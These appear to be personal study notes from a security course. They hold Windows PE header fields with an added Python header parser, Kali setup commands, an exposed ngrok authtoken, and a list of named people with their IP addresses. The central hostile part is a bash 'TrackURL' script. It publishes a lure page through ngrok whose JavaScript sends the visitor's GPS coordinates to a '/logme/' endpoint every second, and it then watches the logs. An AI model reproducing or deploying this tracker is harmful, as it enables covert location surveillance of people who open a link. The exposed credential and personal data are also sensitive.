2022-06-21


*Windows PE

1. Windows Preinstallation Environment
2. Windows Portable Executable



1. Dos Header  -> the signature code is MZ
2. Dos Stub -> meaningless code; it can be changed freely without affecting execution.
3. NT Header
3-1) Signature -> the signature code is PE
3-2) File Header
  WORD  Machine; -> machine (CPU) type: 014C
  WORD  NumberOfSections;  -> number of sections: 0003
  DWORD TimeDateStamp; -> creation time: 48025287
  DWORD PointerToSymbolTable;
  DWORD NumberOfSymbols;
  WORD  SizeOfOptionalHeader; -> size of the Optional Header: 00E0
  WORD  Characteristics;  -> characteristics of the file: 010F
3-3) Optional Header
  WORD                 Magic;  -> type of executable: 010B
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;   -> address where execution starts once the file is loaded into memory: 0000739D
  DWORD                BaseOfCode; -> start of the code area
  DWORD                BaseOfData; -> start of the data area
  DWORD                ImageBase; -> 01000000
  DWORD                SectionAlignment; -> alignment multiple when the image is in memory
  DWORD                FileAlignment; -> alignment multiple when the image is a file on disk
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage; -> size when loaded in memory
  DWORD                SizeOfHeaders; -> size of the headers
  DWORD                CheckSum;
  WORD                 Subsystem; -> screen type when run (CUI, GUI, etc.)
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;
  IMAGE_DATA_DIRECTORY DataDirectory
4. text(code) Header
5. data Header
6. rsrc Header

7. text(code) Section
8. data Section
9. rsrc Section
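
Added example (not part of the original notes): a small Python parser that walks the header chain listed above (Dos Header, Signature, File Header, Optional Header) and validates each step. The function names, the e_lfanew offset of 0x80, and the SectionAlignment, FileAlignment, Subsystem and NumberOfRvaAndSizes values in the sample are assumptions; the other values are the ones noted above.

```python
import struct
from datetime import datetime, timezone

FILE_HDR = struct.Struct("<HHIIIHH")         # IMAGE_FILE_HEADER (20 bytes)
OPT_HDR32 = struct.Struct("<HBB9I6H4I2H6I")  # PE32 optional header up to NumberOfRvaAndSizes (96 bytes)

def parse_pe_headers(data: bytes) -> dict:
    """Walk Dos Header -> Signature -> File Header -> Optional Header (PE32 only)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature in Dos Header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # file offset of the NT Header
    fh_off = e_lfanew + 4
    opt_off = fh_off + FILE_HDR.size
    if opt_off + OPT_HDR32.size > len(data):
        raise ValueError("e_lfanew points past the end of the file")
    if data[e_lfanew:fh_off] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, stamp, _, _, opt_size, chars = FILE_HDR.unpack_from(data, fh_off)
    opt = OPT_HDR32.unpack_from(data, opt_off)
    if opt[0] != 0x010B:
        raise ValueError("Optional Header is not PE32 (Magic != 010B)")
    return {
        "Machine": machine, "NumberOfSections": nsec, "Characteristics": chars,
        "TimeDateStamp": datetime.fromtimestamp(stamp, timezone.utc),
        "AddressOfEntryPoint": opt[6], "ImageBase": opt[9],
        "EntryPointVA": opt[9] + opt[6],           # where execution starts once loaded
        "SectionAlignment": opt[10], "FileAlignment": opt[11], "Subsystem": opt[22],
        "FirstSectionHeader": opt_off + opt_size,  # section headers follow the Optional Header
    }

def build_sample() -> bytes:
    """Constructed header-only image built from the field values in the notes."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x80)  # e_lfanew = 0x80 (assumed)
    stub = bytes(0x80 - len(dos))                         # Dos Stub: contents do not matter
    fh = FILE_HDR.pack(0x014C, 3, 0x48025287, 0, 0, 0x00E0, 0x010F)
    opt = [0] * 30
    opt[0], opt[6], opt[9] = 0x010B, 0x0000739D, 0x01000000
    opt[10], opt[11], opt[22], opt[29] = 0x1000, 0x200, 2, 16  # assumed, not from the notes
    return dos + stub + b"PE\0\0" + fh + OPT_HDR32.pack(*opt) + bytes(16 * 8)

if __name__ == "__main__":
    for name, value in parse_pe_headers(build_sample()).items():
        print(f"{name:20} {value:#x}" if isinstance(value, int) else f"{name:20} {value}")
```

SizeOfOptionalHeader (00E0) is what locates the first section header, which is why the parser reads it from the File Header instead of assuming a fixed size.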




----------------------
sudo passwd root
kali
toor
toor

TrackURL

apt-get update

apt-get install gedit


service apache2 start == systemctl start httpd

gnome-terminal -e './ngrok http 80'

apt-get install gnome-terminal
apt-get install xterm



'./ngrok config add-authtoken 2AsCJD6nlqu4BI8CEoIZKAZaVJJ_884HESRjtSZscmWHS9EFG'
#!/bin/bash

#64_bit
#xterm -e ./ngrok http 80 & clear

#32_Bit
gnome-terminal -e './ngrok http 80'
'./ngrok config add-authtoken 2AsCJD6nlqu4BI8CEoIZKAZaVJJ_884HESRjtSZscmWHS9EFG'

echo "            ______________________________________________________   
            7      77  _  77  _  77     77  7  77  7  77  _  77  7   
            !__  __!|    _||  _  ||  ___!|   __!|  |  ||    _||  |   
              7  7  |  _ \ |  7  ||  7___|     ||  |  ||  _ \ |  !___
              |  |  |  7  ||  |  ||     7|  7  ||  !  ||  7  ||     7
              !__!  !__!__!!__!__!!_____!!__!__!!_____!!__!__!!_____!
                                                                     "
sleep 5
read -p '           URL: ' varurl
echo "<!DOCTYPE html>

<html>
    <head>
        <title> ㄴㅁㅇㄹㄴㅁㅇㄹ </title>
        <style type=\"text/css\">
            
            body {
                background-image: url(\"skull.jpg\");
                background-size: 1000px 1600px;
                background-repeat: no-repeat;
            }

        </style>
    </head>
    <body>

        <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js\" type='text/javascript' ></script>
        <script type='text/javascript'>
        function httpGet(theUrl)
        {
            var xmlHttp = new XMLHttpRequest();
            xmlHttp.open( \"GET\", theUrl, false ); // false for synchronous request
            xmlHttp.send( null );
            return xmlHttp.responseText;
        }


        function autoUpdate() {
          navigator.geolocation.getCurrentPosition(function(position) {
            coords = position.coords.latitude + \",\" + position.coords.longitude;
             url = \""$varurl"/logme/\" + coords;
            httpGet(url);
            console.log('should be working');
            setTimeout(autoUpdate, 1000);
        })
        };
        \$(document).ready(function(){
           autoUpdate();
        });

        </script>
    </body>
</html>" > index.html

mv index.html /var/www/html/index.html
cp skull.jpg /var/www/html/skull.jpg
service apache2 start
echo "         ______________________________________________________   
         7      77  _  77  _  77     77  7  77  7  77  _  77  7   
         !__  __!|    _||  _  ||  ___!|   __!|  |  ||    _||  |   
           7  7  |  _ \ |  7  ||  7___|     ||  |  ||  _ \ |  !___
           |  |  |  7  ||  |  ||     7|  7  ||  !  ||  7  ||     7
           !__!  !__!__!!__!__!!_____!!__!__!!_____!!__!__!!_____!
                                                                  " > /var/log/apache2/access.log
xterm -e tail -f /var/log/apache2/access.log &
clear
exit





In /usr/bin,
the google-chrome-stable file

--user-data-dir --test-type --no-sandbox

----Input method installation----
apt-get install fcitx-lib*

apt-get install fcitx-hangul



------------------------------------------------
강순구[192.168.0.20] : 192.168.100.11(김정혜)
  192.168.250.11(윤채은)
20001 / 20002
------------------------------------------------
김정혜[192.168.0.30] : 192.168.150.10(박정혁)
                192.168.100.10(강순구)
30001 / 30002
------------------------------------------------
윤채은[192.168.0.40] : 192.168.200.10(박정혁)
  192.168.250.10(강순구)
40001 / 40002
------------------------------------------------
박정혁[192.168.0.200] : 192.168.150.11(김정혜)
    192.168.200.11(윤채은)
50001 / 50002
------------------------------------------------








